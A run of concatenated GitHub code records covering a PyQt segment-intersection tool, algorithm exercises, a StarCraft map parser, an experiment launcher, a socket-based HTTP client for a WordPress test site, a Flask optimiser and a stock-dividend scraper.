XP=S[4]+t2*(S[6]-S[4])\r\n            YP=S[5]+t2*(S[7]-S[5])\r\n            #determine where point P is located\r\n            if t1>=0 and t1<=1 and t2>=0 and t2<=1:\r\n                self.x_6label.setText(str('{:.3f}'.format(XP)))\r\n                self.y_6label.setText(str('{:.3f}'.format(YP)))\r\n                
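# t1 and t2 both in [0, 1]: P lies on both segments\r\n                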
self.informacja.setText('Na przecięciu dwóch odcinków')\r\n            elif 0<=t1<=1:\r\n                self.x_6label.setText(str('{:.3f}'.format(XP)))\r\n                self.y_6label.setText(str('{:.3f}'.format(YP)))\r\n                self.informacja.setText('Na przedłużeniu odcinka CD')\r\n            elif 0<=t2<=1: \r\n                self.x_6label.setText(str('{:.3f}'.format(XP)))\r\n                self.y_6label.setText(str('{:.3f}'.format(YP)))\r\n                self.informacja.setText('Na przedłużeniu odcinka AB')\r\n            else:\r\n                self.x_6label.setText(str('{:.3f}'.format(XP)))\r\n                self.y_6label.setText(str('{:.3f}'.format(YP)))\r\n                self.informacja.setText('Na przedłużeniu obu odcinków')\r\n        \r\n        # guard against division by zero\r\n        else:\r\n            msg_err = QMessageBox()\r\n            msg_err.setIcon(QMessageBox.Warning)\r\n            msg_err.setWindowTitle('Błąd')\r\n            msg_err.setStandardButtons(QMessageBox.Ok)\r\n            msg_err.setText('Dzielenie przez zero. Nie można obliczyć współrzędnych punktu przecięcia.')\r\n            msg_err.exec_()\r\n            self.figure.clear()\r\n            self.canvas.draw()\r\n        \r\n        if x is not None and y is not None:\r\n            self.figure.clear()\r\n            ax = self.figure.add_subplot(111)\r\n            ax.plot(x, y, 'o',color=clr)\r\n            ax.text(x,y,'A['+str(x)+','+str(y)+']')\r\n            ax.plot(x1, y1, 'o', color=clr)\r\n            ax.text(x1,y1,'B['+str(x1)+','+str(y1)+']')\r\n            ax.plot(x2, y2, 'o', color=clr)\r\n            ax.text(x2,y2,'C['+str(x2)+','+str(y2)+']')\r\n            ax.plot(x3, y3, 'o', color=clr)\r\n            ax.text(x3,y3,'D['+str(x3)+','+str(y3)+']')\r\n            ax.plot((x,x1), (y,y1),'-',color=clr)\r\n            ax.plot((x2,x3), (y2,y3),'-',color=clr)\r\n            if M != 0:\r\n                ax.plot(XP,YP,'o',color='black')\r\n                ax.text(XP,YP,'P['+str('{:.3f}'.format(XP))+','+str('{:.3f}'.format(YP))+']')\r\n                ax.plot((x,XP), (y,YP),'--',dashes=(1,5),color=clr)\r\n                ax.plot((x1,XP),(y1,YP),'--',dashes=(1,5),color=clr)\r\n                ax.plot((x2,XP),(y2,YP),'--',dashes=(1,5),color=clr)\r\n                ax.plot((x3,XP),(y3,YP),'--',dashes=(1,5),color=clr)\r\n            #plt.plot(P1, P2, P3, P4, marker='o', color=clr)\r\n            #plt.plot(XP,YP,'o','k')\r\n            #plt.plot(P1, P2, XP, YP,'--','k')\r\n            self.canvas.draw() \r\n        # check that the data was entered correctly \r\n        else:\r\n            msg_err = QMessageBox()\r\n            msg_err.setIcon(QMessageBox.Warning)\r\n            msg_err.setWindowTitle('Błąd')\r\n            msg_err.setStandardButtons(QMessageBox.Ok)\r\n            msg_err.setText('Wprowadzono niepoprawne współrzędne')\r\n            msg_err.exec_()\r\n            self.figure.clear()\r\n            self.canvas.draw()\r\n        \r\n    def handleButton(self, clr='r'):\r\n        self.rysuj(clr) # draw the plot; pass clr through so the colour picker actually takes effect\r\n    \r\n    def clrChooseF(self):\r\n        color=QColorDialog.getColor()\r\n        if color.isValid():\r\n            self.handleButton(color.name()) # lets the user choose the plot colour\r\n    \r\n    def usun(self): # clears the data from the input fields\r\n        self.xEdit.clear()\r\n        self.yEdit.clear()\r\n        self.x_2Edit.clear()\r\n        self.y_2Edit.clear()\r\n        self.x_3Edit.clear()\r\n        self.y_3Edit.clear()\r\n        self.x_4Edit.clear()\r\n        self.y_4Edit.clear()\r\n        self.x_6label.clear()\r\n        self.y_6label.clear()\r\n        self.informacja.clear()\r\n        self.figure.clear()\r\n        \r\n        \r\n        \r\n    def zapisz(self): # saves the results to a file\r\n        wyniki = open('wyniki.txt','a')\r\n        wyniki.write(55*'*')\r\n        wyniki.write('\\n|{:^10}|{:^10}|{:^30}|\\n'.format('XP', 'YP', 'Informacja o punkcie P'))\r\n        wyniki.write(55*'*')\r\n        wyniki.write('\\n|{:^10}|{:^10}|{:^30}|\\n'.format(self.x_6label.text(),self.y_6label.text(), self.informacja.text()))\r\n        wyniki.write(55*'*')\r\n        wyniki.close()  # close the handle so the appended rows are flushed to disk\r\n\r\nif __name__ == '__main__':\r\n    if not QApplication.instance():\r\n        app=QApplication(sys.argv)\r\n    else:\r\n        app=QApplication.instance()\r\n    \r\n    window = Window()\r\n    window.show()\r\n    sys.exit(app.exec_())\r\n    
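# --- editor's note: an illustrative sketch, not part of the original file ---\r\n# rysuj() above solves A + t1*(B - A) = C + t2*(D - C) for (t1, t2) via Cramer's rule.\r\n# A minimal standalone version of that computation (the helper name is hypothetical):\r\ndef _segment_params(ax, ay, bx, by, cx, cy, dx, dy):\r\n    den = (bx - ax) * (dy - cy) - (by - ay) * (dx - cx)\r\n    if den == 0:\r\n        return None  # parallel or degenerate segments: no unique intersection\r\n    t1 = ((cx - ax) * (dy - cy) - (cy - ay) * (dx - cx)) / den\r\n    t2 = ((cx - ax) * (by - ay) - (cy - ay) * (bx - ax)) / den\r\n    return t1, t2  # both in [0, 1] exactly when the segments themselves cross\r\n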
","repo_name":"291425/repository2","sub_path":"Kamila_Zembrzycka_grupa1_projekt1.py","file_name":"Kamila_Zembrzycka_grupa1_projekt1.py","file_ext":"py","file_size_in_byte":9664,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"74022846232","text":"# -*- coding: utf-8 -*-\n\n\nclass MedianFinder(object):\n\n def __init__(self):\n \"\"\"\n initialize your data structure here.\n \"\"\"\n self.length = 0\n self.result = list()\n \n def halfSearch(self, num, left, right):\n if left == right:\n if num >= self.result[left]:\n self.result.insert(left + 1, num)\n else:\n self.result.insert(left, num)\n \n return \n\n half_value = int((left + right) / 2)\n if self.result[half_value] > num:\n self.halfSearch(num, left, half_value)\n else:\n self.halfSearch(num, half_value + 1, right)\n\n def addNum(self, num):\n \"\"\"\n :type num: int\n :rtype: None\n \"\"\"\n if num or num == 0:\n if not self.result:\n self.result.append(num)\n else:\n self.halfSearch(num, 0, self.length - 1)\n self.length = len(self.result)\n\n def findMedian(self):\n \"\"\"\n :rtype: float\n \"\"\"\n print(self.result)\n if self.length % 2 != 0:\n half_index = int(self.length / 2)\n return self.result[half_index]\n else:\n half_index = int(self.length / 2)\n return (self.result[half_index] + self.result[half_index - 1]) / 2\n \n\nif __name__ == \"__main__\":\n S = MedianFinder()\n S.addNum(\"\")\n S.addNum(1)\n S.addNum(2)\n print(S.findMedian())\n S.addNum(\"\")\n S.addNum(3)\n # print(S.findMedian())\n # S.addNum(\"\")\n # print(S.findMedian())\n\n \n# Your MedianFinder object will be instantiated and called as such:\n# obj = MedianFinder()\n# obj.addNum(num)\n# param_2 = obj.findMedian()","repo_name":"KilburnBuilding/Leetcode","sub_path":"295.py","file_name":"295.py","file_ext":"py","file_size_in_byte":1735,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"18972000928","text":"# 이것이 취업을 위한 코딩 테스트다 with 파이썬 (p.150)\n# 실전문제 음료수 얼려 먹기 > dfs\n\n# n, m = map(int, input().split())\nn, m = 5, 6\n\ngraph = [\n [1, 0, 1, 0, 1, 0], \n [1, 1, 1, 1, 1, 1], \n [0, 0, 0, 0, 0, 1], \n [1, 0, 1, 1, 1, 1], \n [1, 1, 1, 1, 0, 0]\n ]\n\n#graph = []\n#for i in range(n):\n# graph.append(list(map(int, input())))\n\ndef dfs(x, y):\n if x <= -1 or x >= n or y <= -1 or y >= m:\n return False\n if graph[x][y] == 0:\n graph[x][y] = 1\n dfs(x, y+1) # 상\n dfs(x, y-1) # 하\n dfs(x-1, y) # 좌\n dfs(x+1, y) # 우\n return True\n return False\n\nresult = 0\nfor i in range(n):\n for j in range(m):\n if dfs(i, j) == True:\n result += 1\n\n\nprint(result)","repo_name":"Jiyongs/algorithm","sub_path":"dfs_bfs/broke_ice.py","file_name":"broke_ice.py","file_ext":"py","file_size_in_byte":778,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"39566393448","text":"\nfrom .CHKRequirements import CHKRequirements\nfrom .CHKSectionUnknown import CHKSectionUnknown\nfrom .Sections import *\n\nfrom ...FileFormats import TBL, AIBIN\n\nfrom ...Utilities import Assets\nfrom ...Utilities.fileutils import load_file\nfrom ...Utilities.PyMSError import PyMSError\nfrom ...Utilities.AtomicWriter import AtomicWriter\n\nimport struct, math, os\n\nclass CHK:\n\tSECTION_TYPES = 
{\n\t\tCHKSectionTYPE.NAME:CHKSectionTYPE,\n\t\tCHKSectionVER.NAME:CHKSectionVER,\n\t\tCHKSectionIVER.NAME:CHKSectionIVER,\n\t\tCHKSectionIVE2.NAME:CHKSectionIVE2,\n\t\tCHKSectionVCOD.NAME:CHKSectionVCOD,\n\t\tCHKSectionIOWN.NAME:CHKSectionIOWN,\n\t\tCHKSectionOWNR.NAME:CHKSectionOWNR,\n\t\tCHKSectionERA.NAME:CHKSectionERA,\n\t\tCHKSectionDIM.NAME:CHKSectionDIM,\n\t\tCHKSectionSIDE.NAME:CHKSectionSIDE,\n\t\tCHKSectionMTXM.NAME:CHKSectionMTXM,\n\t\tCHKSectionPUNI.NAME:CHKSectionPUNI,\n\t\tCHKSectionUPGR.NAME:CHKSectionUPGR,\n\t\tCHKSectionPTEC.NAME:CHKSectionPTEC,\n\t\tCHKSectionUNIT.NAME:CHKSectionUNIT,\n\t\tCHKSectionTILE.NAME:CHKSectionTILE,\n\t\tCHKSectionDD2.NAME:CHKSectionDD2,\n\t\tCHKSectionTHG2.NAME:CHKSectionTHG2,\n\t\tCHKSectionMASK.NAME:CHKSectionMASK,\n\t\tCHKSectionSTR.NAME:CHKSectionSTR,\n\t\tCHKSectionUPRP.NAME:CHKSectionUPRP,\n\t\tCHKSectionUPUS.NAME:CHKSectionUPUS,\n\t\tCHKSectionMRGN.NAME:CHKSectionMRGN,\n\t\tCHKSectionTRIG.NAME:CHKSectionTRIG,\n\t\tCHKSectionMBRF.NAME:CHKSectionMBRF,\n\t\tCHKSectionSPRP.NAME:CHKSectionSPRP,\n\t\tCHKSectionFORC.NAME:CHKSectionFORC,\n\t\tCHKSectionWAV.NAME:CHKSectionWAV,\n\t\tCHKSectionUNIS.NAME:CHKSectionUNIS,\n\t\tCHKSectionUPGS.NAME:CHKSectionUPGS,\n\t\tCHKSectionTECS.NAME:CHKSectionTECS,\n\t\tCHKSectionSWNM.NAME:CHKSectionSWNM,\n\t\tCHKSectionCOLR.NAME:CHKSectionCOLR,\n\t\tCHKSectionPUPx.NAME:CHKSectionPUPx,\n\t\tCHKSectionPTEx.NAME:CHKSectionPTEx,\n\t\tCHKSectionUNIx.NAME:CHKSectionUNIx,\n\t\tCHKSectionUPGx.NAME:CHKSectionUPGx,\n\t\tCHKSectionTECx.NAME:CHKSectionTECx\n\t}\n\n\tdef __init__(self, stat_txt=None, aiscript=None):\n\t\tif isinstance(stat_txt, TBL.TBL):\n\t\t\tself.stat_txt = stat_txt\n\t\telse:\n\t\t\tif stat_txt == None:\n\t\t\t\tstat_txt = Assets.mpq_file_path('rez', 'stat_txt.tbl')\n\t\t\tself.stat_txt = TBL.TBL()\n\t\t\tself.stat_txt.load_file(stat_txt)\n\t\tif isinstance(aiscript, AIBIN.AIBIN):\n\t\t\tself.aiscript = aiscript\n\t\telse:\n\t\t\tif aiscript == None:\n\t\t\t\taiscript = Assets.mpq_file_path('scripts', 'aiscript.bin')\n\t\t\tself.aiscript = AIBIN.AIBIN(stat_txt=self.stat_txt)\n\t\t\tself.aiscript.load_file(aiscript)\n\t\tself.sections = {}\n\t\tself.section_order = []\n\n\tdef get_section(self, name, game_mode=CHKRequirements.MODE_ALL):\n\t\tsect_class = CHK.SECTION_TYPES[name]\n\t\trequired = False\n\n\t\tif name == CHKSectionVER.NAME:\n\t\t\trequired = True\n\t\telif sect_class:\n\t\t\trequired = sect_class.REQUIREMENTS.is_required(self, game_mode)\n\t\tsect = self.sections.get(name)\n\t\tif required and sect == None and sect_class:\n\t\t\tsect = sect_class(self)\n\t\t\tself.sections[name] = sect\n\t\treturn sect\n\n\tdef player_color(self, player):\n\t\tcolors = CHKSectionCOLR.DEFAULT_COLORS\n\t\tcolr = self.get_section(CHKSectionCOLR.NAME)\n\t\tif colr:\n\t\t\tcolors = colr.colors\n\t\tcolors.extend((CHKSectionCOLR.GREEN,CHKSectionCOLR.PALE_YELLOW,CHKSectionCOLR.TAN,CHKSectionCOLR.NEUTRAL))\n\t\treturn colors[player]\n\n\tdef load_file(self, file):\n\t\tdata = load_file(file, 'CHK')\n\t\ttry:\n\t\t\tself.load_data(data)\n\t\texcept PyMSError as e:\n\t\t\traise e\n\t\texcept:\n\t\t\traise PyMSError('Load',\"Unsupported CHK file '%s', could possibly be corrupt\" % file)\n\n\tdef load_data(self, data):\n\t\toffset = 0\n\t\tsections = {}\n\t\tsection_order = []\n\t\ttoProcess = []\n\t\twhile offset < len(data)-8:\n\t\t\tname,length = struct.unpack('<4sL', data[offset:offset+8])\n\t\t\toffset += 8\n\t\t\tsect_class = CHK.SECTION_TYPES.get(name)\n\t\t\tif not sect_class:\n\t\t\t\tsect = 
CHKSectionUnknown(self, name)\n\t\t\telse:\n\t\t\t\tsect = sect_class(self)\n\t\t\tsect.load_data(data[offset:offset+min(length,len(data)-offset)])\n\t\t\tsections[name] = sect\n\t\t\tsection_order.append(name)\n\t\t\tif hasattr(sect, \"process_data\"):\n\t\t\t\ttoProcess.append(sect)\n\t\t\toffset += length\n\t\tself.sections = sections\n\t\tself.section_order = section_order\n\t\tfor sect in toProcess:\n\t\t\tsect.process_data()\n\n\tdef save_file(self, file):\n\t\tdata = self.save_data()\n\t\ttry:\n\t\t\tf = AtomicWriter(file, 'wb')\n\t\texcept:\n\t\t\traise PyMSError('Save',\"Could not save CHK to file '%s'\" % file)\n\t\tf.write(data)\n\t\tf.close()\n\n\tdef save_data(self):\n\t\tresult = ''\n\t\torder = []\n\t\torder.extend(self.section_order)\n\t\tfor name in self.sections.keys():\n\t\t\tif not name in order:\n\t\t\t\torder.append(name)\n\t\tfor name in order:\n\t\t\tsection = self.sections.get(name)\n\t\t\tif section:\n\t\t\t\tdata = section.save_data()\n\t\t\t\tresult += struct.pack('<4sL', section.name, len(data))\n\t\t\t\tresult += data\n\t\treturn result\n","repo_name":"poiuyqwert/PyMS","sub_path":"PyMS/FileFormats/CHK/CHK.py","file_name":"CHK.py","file_ext":"py","file_size_in_byte":4562,"program_lang":"python","lang":"en","doc_type":"code","stars":42,"dataset":"github-code","pt":"5"} +{"seq_id":"19433693606","text":"import os\nimport subprocess\nimport time\nimport numpy as np\n\nATARI_ENV_IDS = [\n \"AlienNoFrameskip-v4\",\n \"AmidarNoFrameskip-v4\",\n \"AssaultNoFrameskip-v4\",\n \"AsterixNoFrameskip-v4\",\n \"AsteroidsNoFrameskip-v4\",\n \"AtlantisNoFrameskip-v4\",\n \"BankHeistNoFrameskip-v4\",\n \"BattleZoneNoFrameskip-v4\",\n \"BeamRiderNoFrameskip-v4\",\n \"BerzerkNoFrameskip-v4\",\n \"BowlingNoFrameskip-v4\",\n \"BoxingNoFrameskip-v4\",\n \"BreakoutNoFrameskip-v4\",\n \"CentipedeNoFrameskip-v4\",\n \"ChopperCommandNoFrameskip-v4\",\n \"CrazyClimberNoFrameskip-v4\",\n \"-\",\n \"DemonAttackNoFrameskip-v4\",\n \"DoubleDunkNoFrameskip-v4\",\n \"EnduroNoFrameskip-v4\",\n \"FishingDerbyNoFrameskip-v4\",\n \"FreewayNoFrameskip-v4\",\n \"FrostbiteNoFrameskip-v4\",\n \"GopherNoFrameskip-v4\",\n \"GravitarNoFrameskip-v4\",\n \"HeroNoFrameskip-v4\",\n \"IceHockeyNoFrameskip-v4\",\n \"JamesbondNoFrameskip-v4\",\n \"KangarooNoFrameskip-v4\",\n \"KrullNoFrameskip-v4\",\n \"KungFuMasterNoFrameskip-v4\",\n \"MontezumaRevengeNoFrameskip-v4\",\n \"MsPacmanNoFrameskip-v4\",\n \"NameThisGameNoFrameskip-v4\",\n \"PhoenixNoFrameskip-v4\",\n \"PitfallNoFrameskip-v4\",\n \"PongNoFrameskip-v4\",\n \"PrivateEyeNoFrameskip-v4\",\n \"QbertNoFrameskip-v4\",\n \"RiverraidNoFrameskip-v4\",\n \"RoadRunnerNoFrameskip-v4\",\n \"RobotankNoFrameskip-v4\",\n \"SeaquestNoFrameskip-v4\",\n \"SkiingNoFrameskip-v4\",\n \"SolarisNoFrameskip-v4\",\n \"SpaceInvadersNoFrameskip-v4\",\n \"StarGunnerNoFrameskip-v4\",\n \"-\",\n \"TennisNoFrameskip-v4\",\n \"TimePilotNoFrameskip-v4\",\n \"TutankhamNoFrameskip-v4\",\n \"UpNDownNoFrameskip-v4\",\n \"VentureNoFrameskip-v4\",\n \"VideoPinballNoFrameskip-v4\",\n \"WizardOfWorNoFrameskip-v4\",\n \"YarsRevengeNoFrameskip-v4\",\n \"ZaxxonNoFrameskip-v4\",]\nsuper_exp_id = \"2018:05:16-00:41:31\"\n# super_exp_id = time.strftime(\"%Y:%m:%d-%H:%M:%S\")\ngames = [\n # \"FrostbiteNoFrameskip-v4\",\n # \"SkiingNoFrameskip-v4\",\n # \"VentureNoFrameskip-v4\",\n \"KangarooNoFrameskip-v4\",\n # \"GravitarNoFrameskip-v4\",\n # \"AsteroidsNoFrameskip-v4\",\n # \"ZaxxonNoFrameskip-v4\",\n # \"AmidarNoFrameskip-v4\",\n # \"AssaultNoFrameskip-v4\",\n # \"AsterixNoFrameskip-v4\",\n # 
\"SeaquestNoFrameskip-v4\",\n # \"EnduroNoFrameskip-v4\",\n # \"AtlantisNoFrameskip-v4\"\n ]\n\nfrom gym import envs\nall_envs = envs.registry.all()\nenv_ids = [env_spec.id for env_spec in all_envs]\nfor env_id in games:\n assert env_id in env_ids\n\nn_games = len(games)\nseeds = range(5)\nrnd = np.random.randint(2**31)\n\nprint(\"This will launch {} jobs for 12 hours on 8 nodes each.\".format(n_games * len(seeds)))\nprint(\"This will cost you a maximum of {} core-hours\".format(12*8*32*n_games*len(seeds)))\nif not input(\"Is your config file correct? y/n:\")==\"y\":\n exit()\nif not input(\"Is the number of hours and nodes and tasks set correctly in your slurm script? y/n:\")==\"y\":\n exit()\nprint(\"If you wish to proceed, copy the following number: {}\".format(rnd))\nx=input(\">>\")\nif x == str(rnd):\n\n os.environ[\"super_exp_id\"]=super_exp_id\n for env_id in games:\n if not env_id ==\"-\":\n # os.mkdir(os.path.join(\"logs\", super_exp_id, env_id))\n\n for seed in seeds:\n\n os.makedirs(os.path.join(\"logs\", super_exp_id, env_id, str(seed)))\n new_shell_env = os.environ.copy()\n new_shell_env[\"global_seed\"]=str(seed)\n new_shell_env[\"env_id\"]=env_id\n subprocess.run(\"sbatch slurm/slurm_python_single.peta4\".split(),env=new_shell_env)\n\nelse:\n print(\"Closing...\")\n","repo_name":"boyentenbi/ga-dist","sub_path":"distributed/scripts/launch_multi.py","file_name":"launch_multi.py","file_ext":"py","file_size_in_byte":3609,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"31811777212","text":"import re\n\nHOST = \"blogtest.vnprogramming.com\"\nPORT = 80\nPATH_LOGIN = \"/wp-login.php\"\nRECV_BUF = 1024\n\n\nclass ReqHeader:\n @staticmethod\n def get(cookie: str, host=HOST, path=PATH_LOGIN) -> str:\n \"\"\"Generate GET request's header\"\"\"\n return (f\"GET {path} HTTP/1.1\\r\\n\"\n f\"Cookie: {cookie}\\r\\n\"\n f\"Host: {host}\\r\\n\"\n f\"Connection: close\\r\\n\\r\\n\")\n\n @staticmethod\n def post_form(cookie: str, boundary: str, length: int, path: str) -> str:\n \"\"\"Generate POST request's header with form-data\"\"\"\n return (f\"POST {path} HTTP/1.1\\r\\n\"\n f\"Host: blogtest.vnprogramming.com\\r\\n\"\n f\"Content-Length: {length}\\r\\n\"\n f\"Content-Type: multipart/form-data; boundary={boundary}\\r\\n\"\n f\"Cookie: {cookie}\\r\\n\"\n f\"Connection: close\\r\\n\\r\\n\")\n\n @staticmethod\n def post_login(host, path, credential) -> str:\n \"\"\"Generate POST request's header with x-www-form-urlencoded\"\"\"\n user, password = credential\n body = (f\"log={user}&pwd={password}\"\n f\"&wp-submit=Log+In&redirect_to=http%3A%2F%2Fblogtest.vnprogramming.com%2Fwp-admin%2F&testcookie=1\")\n return (f\"POST {path} HTTP/1.1\\r\\n\"\n f\"Host: {host}\\r\\n\"\n f\"Content-Length: {len(body)}\\r\\n\"\n f\"Content-Type: application/x-www-form-urlencoded\\r\\n\"\n f\"Cookie: wordpress_test_cookie=WP%20Cookie%20check\\r\\n\"\n f\"Connection: close\\r\\n\\r\\n\"\n + body)\n\n\nclass Response:\n \"\"\"Object that holds response's data\"\"\"\n\n def __init__(self, data: str or bytes):\n if type(data).__name__ == \"str\":\n self.res_header, self.res_body = tuple(data.split(\"\\r\\n\\r\\n\", 1))\n self.res_header += \"\\r\\n\\r\\n\"\n else:\n self.res_header, self.res_body = tuple(data.split(b\"\\r\\n\\r\\n\", 1))\n self.res_header = self.res_header.decode() + \"\\r\\n\\r\\n\"\n\n def header(self) -> str:\n \"\"\":return response's header\"\"\"\n return self.res_header\n\n def body(self) -> str or bytes:\n \"\"\":return response's 
body\"\"\"\n return self.res_body\n\n def re(self, string1, string2=\"\"):\n match = re.findall(fr\"^{string1}: (.*){string2}.*\\r$\", self.res_header, flags=re.MULTILINE)\n return match\n\n def length(self):\n \"\"\"Get Content-Length\"\"\"\n length = self.re(\"Content-Length\")\n return length[0] if length else None\n\n def cookie(self):\n \"\"\"Get Set-Cookie\"\"\"\n cookie_list = \"; \".join(self.re(\"Set-Cookie\", \";\"))\n return cookie_list\n\n def location(self):\n \"\"\"Get redirect location\"\"\"\n from urllib.parse import urlparse\n location = self.re(\"Location\")\n return urlparse(location[0]) if location else None\n\n def code(self):\n \"\"\"Get response code\"\"\"\n res_code = re.findall(r\"^HTTP/1\\.1 (\\d\\d\\d) .*\\r$\", self.res_header, flags=re.MULTILINE)\n return res_code[0] if res_code else None\n\n def type(self):\n \"\"\"Get Content-Type\"\"\"\n content_type = self.re(\"Content-Type\")\n return content_type[0] if type else None\n\n\n# class ResHeader:\n# \"\"\"Object that holds response's header data\"\"\"\n#\n# def __init__(self, res_header):\n# self.res_header = res_header\n#\n# def re(self, string1, string2=\"\"):\n# match = re.findall(fr\"^{string1}: (.*){string2}.*\\r$\", self.res_header, flags=re.MULTILINE)\n# return match\n#\n# def length(self):\n# \"\"\"Get Content-Length\"\"\"\n# length = self.re(\"Content-Length\")\n# return length[0] if length else None\n#\n# def cookie(self):\n# \"\"\"Get Set-Cookie\"\"\"\n# cookie_list = \"; \".join(self.re(\"Set-Cookie\", \";\"))\n# return cookie_list\n#\n# def location(self):\n# \"\"\"Get redirect location\"\"\"\n# from urllib.parse import urlparse\n# location = self.re(\"Location\")\n# return urlparse(location[0]) if location else None\n#\n# def code(self):\n# \"\"\"Get response code\"\"\"\n# res_code = re.findall(r\"^HTTP/1\\.1 (\\d\\d\\d) .*\\r$\", self.res_header, flags=re.MULTILINE)\n# return res_code[0] if res_code else None\n#\n# def type(self):\n# \"\"\"Get Content-Type\"\"\"\n# content_type = self.re(\"Content-Type\")\n# return content_type[0] if type else None\n#\n# def __str__(self):\n# return self.res_header\n\n\ndef get_res(req: bytes or str, host=HOST, port=PORT, raw=False) -> str or bytes or None:\n \"\"\"\n Send request and receive response from server\n :param req: request to send to server\n :param host:\n :param port:\n :param raw: control return type (True -> return bytes, else return str)\n :return: response from server\n \"\"\"\n import socket\n\n req = req.encode() if type(req).__name__ == \"str\" else req\n with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:\n s.connect((host, port))\n s.sendall(req)\n res = recvall(s)\n if not res:\n return None\n return res if raw else res.decode()\n\n\ndef recvall(s) -> bytes:\n \"\"\"Receive complete response from server \"\"\"\n buf = b''\n chunk = s.recv(RECV_BUF)\n while len(chunk) != 0:\n buf += chunk\n chunk = s.recv(RECV_BUF)\n return buf\n","repo_name":"vcth4nh/VCS","sub_path":"prog4/Final/misc.py","file_name":"misc.py","file_ext":"py","file_size_in_byte":5316,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"25310125039","text":"from flask import Flask, render_template, request\nimport scipy.optimize as opt\nimport numpy as np\n\n\napp = Flask(__name__)\nimport calc_func as calc\n\n\n@app.route('/')\ndef serve_app():\n return render_template('index.html')\n\n\n@app.route('/calculate', methods=[\"GET\", \"POST\"])\ndef calculate():\n # check the request method to ensure the handling 
of POST request only\n if request.method == \"POST\":\n # store form values\n\n input_val = {\n 'temp2': request.form['temp2'],\n 'temp1': request.form['temp1'],\n 'steam_cost': request.form['steam_cost'],\n 'pipe_length': request.form['pipe_length'],\n 'pipe_size': request.form['pipe_size'],\n 'insulation_mat': request.form['insulation_mat'],\n 'runtime': request.form['runtime'],\n 'cost_per_length': request.form['cost_per_length'],\n 'cost_per_volume': request.form['cost_per_volume']\n }\n\n max_temp = float(input_val['temp2']) + 273\n pipe_size = float(input_val['pipe_size'])/2\n\n objective_function = lambda x: calc.total_costs(input_val, x[0], x[1])\n constraint1 = ({'type': 'ineq', 'fun': lambda x: np.array(max_temp - x[1])})\n constraint2 = ({'type': 'ineq', 'fun': lambda x: np.array(x[1] - 303)})\n\n results = opt.minimize(objective_function, x0=[3.0, max_temp-10], method='trust-constr', constraints=[constraint1, constraint2], options={'disp': True, 'xtol': 1e-08, 'gtol': 1e-08, 'barrier_tol': 1e-08, 'maxiter': 1100})\n thickness = results['x'][0] - pipe_size\n\n return render_template('calculate.html', results=results, thickness=thickness)\n\n\nif __name__ == \"__main__\":\n app.run()\n","repo_name":"cechiorlu/epitc","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"9198273384","text":"from gawseed.threatfeed.config import Config\n\nfrom collections import Counter\n\nclass Summarizer(Config):\n \"\"\"Summarizes/counts data from another enricher's data;\n Produces a dictionary with data_key/count pairs\"\"\"\n def __init__(self, conf, search_index, dataset, is_binary, loader=None):\n super().__init__(conf)\n\n self.require(['enrichment_key', 'data_key'])\n\n self._data_key = self.config(\"data_key\",\n help=\"The data key to summarize data by\")\n self._enrichment_key = self.config(\"enrichment_key\",\n help=\"The enrichment key for the data to be sorted\")\n self._output_key = self.config('output_key', 'datasource',\n help=\"The output key to store the returned data in.\")\n\n def check_enrichment_data(self, enrichment_data):\n if self._enrichment_key not in enrichment_data:\n self.verbose(\"summarizer data wasn't present\")\n self.verbose(\" keys present:\" + str(enrichment_data.keys()))\n self.verbose(self.get_config())\n return False\n\n if type(enrichment_data[self._enrichment_key]) != list:\n self.verbose(\"summarizer data wasn't in a list: \" + type(enrichment_data[self._enrichment_key]))\n self.verbose(self.get_config())\n return False\n\n return True\n\n def gather(self, count, row, match, enrichment_data):\n \"\"\"Re-sort all the enrichment data based on the specified column\"\"\"\n\n if not self.check_enrichment_data(enrichment_data):\n return (None, None)\n\n counter = Counter()\n for row in enrichment_data[self._enrichment_key]:\n if self._data_key in row:\n counter[row[self._data_key]] += 1\n\n return (self._output_key, dict(counter))\n","repo_name":"gawseed/threat-feed-tools","sub_path":"gawseed/threatfeed/enrichments/summarizer.py","file_name":"summarizer.py","file_ext":"py","file_size_in_byte":1858,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"5"} +{"seq_id":"73963017111","text":"try:\n\tfrom urllib.request import urlopen\nexcept:\n\tfrom urllib2 import urlopen\nfrom bs4 import BeautifulSoup as soup\nimport re, datetime, csv, time, random\n\ndef 
delay():\n\ttime.sleep(random.randint(10,20))\n\ndef get_page_soup(the_url):\n\tprint('try to get data from:', the_url)\n\tclient = urlopen(the_url, timeout=90)\n\tpage_html = client.read()\n\tclient.close()\n\tpage_soup = soup(page_html, 'html.parser')\n\treturn page_soup\n\t\ndef convert_date(date_str):\n\treturn datetime.datetime.strptime(date_str, '%Y-%m-%d')\n\ndef get_divend_data(code):\n\tthe_url = 'http://money.finance.sina.com.cn/corp/go.php/vISSUE_ShareBonus/stockid/' + code + '.phtml'\n\tpage_soup = get_page_soup(the_url)\n\tdata_body = page_soup.find_all('tbody')[0]\n\tdata = list()\n\torig = list()\n\tfor row in data_body.find_all('tr'):\n\t\tcols = row.find_all('td')\n\t\tif len(cols) == 1:\n\t\t\tcontinue\n\t\tpublic_date_str = cols[0].text.strip()\n\t\tregister_date_str = cols[6].text.strip()\n\t\tdivend_str = cols[3].text.strip()\n\t\tdata.append({'public':convert_date(public_date_str), \n\t\t\t\t\t 'register':convert_date(register_date_str) if register_date_str != '--' else convert_date(public_date_str),\n\t\t\t\t\t 'divend':float(divend_str)})\n\t\torig.append(cols)\n\treturn data, orig\n\ndef get_total_stock_data(code):\n\tthe_url = 'http://vip.stock.finance.sina.com.cn/corp/go.php/vCI_StockStructureHistory/stockid/' + code + '/stocktype/TotalStock.phtml'\n\tpage_soup = get_page_soup(the_url)\n\ttables = page_soup.find_all('table', id=re.compile('historyTable*'))\n\n\tdata = list()\n\torig = list()\n\tfor t in tables:\n\t\tfor row in 